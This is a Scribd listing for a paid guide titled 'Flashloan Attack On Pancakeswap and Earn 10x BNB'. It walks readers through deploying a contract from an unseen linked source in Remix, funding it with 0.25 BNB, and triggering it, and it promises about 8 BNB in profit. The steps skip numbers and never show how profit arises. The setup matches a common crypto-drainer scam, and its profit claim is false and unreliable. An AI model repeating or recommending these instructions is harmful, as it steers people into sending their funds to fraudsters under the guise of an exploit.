0% found this document useful (4 votes)
445 views7 pages

Flashloan Attack On Pancakeswap and Earn 10x BNB

This document provides instructions for executing a flash loan attack to earn profits in Binance Coin (BNB). It explains that flash loans allow borrowing any amount of assets without collateral as long as the loan plus fees are repaid in one transaction. The document then lists 17 steps to deploy a smart contract on the Binance Smart Chain network, take out a flash loan of at least 10 BNB, execute transactions to earn profits from liquidity pools, and repay the loan to keep the profits.

Uploaded by

javier
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (4 votes)
445 views7 pages

Flashloan Attack On Pancakeswap and Earn 10x BNB

This document provides instructions for executing a flash loan attack to earn profits in Binance Coin (BNB). It explains that flash loans allow borrowing any amount of assets without collateral as long as the loan plus fees are repaid in one transaction. The document then lists 17 steps to deploy a smart contract on the Binance Smart Chain network, take out a flash loan of at least 10 BNB, execute transactions to earn profits from liquidity pools, and repay the loan to keep the profits.

Uploaded by

javier
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

Thank you for buying my FLASH LOAN ATTACK Method!

Today i will show you how to use flash loan attack to make tons of BNB.
​ ​

What Is a Flash Loans?


 
Flash loans are a feature designed for developers due to the technical knowledge required to
execute one. Flash loans allow you to borrow any available amount of assets without putting up
any collateral, as long as the liquidity is returned to the protocol within one block transaction. To do
a flash loan, you will need to build a contract that requests a flash loan, The contract will then need
to execute the instructed steps and pay back the loan + interest and fees all within the same
transaction.

Short Summary of the process:


1. install and setup metamask in chrome browser. Add Binance smart chain network on your
metamask
2. Go to remix.ethereum.org and creat your own BSC20 Contract Address.
3. Deploy Contract Address.

Okay, let’s begin!

Step 1. Go to remix.ethereum.org and Click Sure.


Step 2. Click on the create new file icon and call it YourTokenName.sol and hit enter.

Step 3. Open provided contract code. copy and paste the contract code into remix.


contract code Link

Step 4 . Click solidity compiler icon second menu button from the left.

Step 5. Then change comply version to 0.5.17


Step 6. Mark Auto Compile And Enable optimization.
Step 7. Select YourTokenName.sol
Step 8. Select Environment Injected Web 3 And Conect your metamask.
Step 9. Select YourTokenName.sol
Step 10. Click Down Button.

​ ​ ​
Step 12. Enter Your Token Name, token symbol and loan amount. loan amount Minimum should be 10 BNB
Step 13. Click on transact icon.

Step 15. Confirm on metamask wallet and wait for confirmation. (New contract will appear under
deployed contract field)

Step 16. Copy new generated contract address. open your metamask and paste contract
address send 0.25 BNB this action will provide liquidity pool for your contract there are going to

be many swaps to use all funds from out liquidity pools.

-Wait for the transaction to confirm.

Step 17. Click on action function button and click on confirm in metamask. (wait for the confirmation)

Step 18. Then check your metamask wallet as you can see i made 8.0839 BNB using this method.


You might also like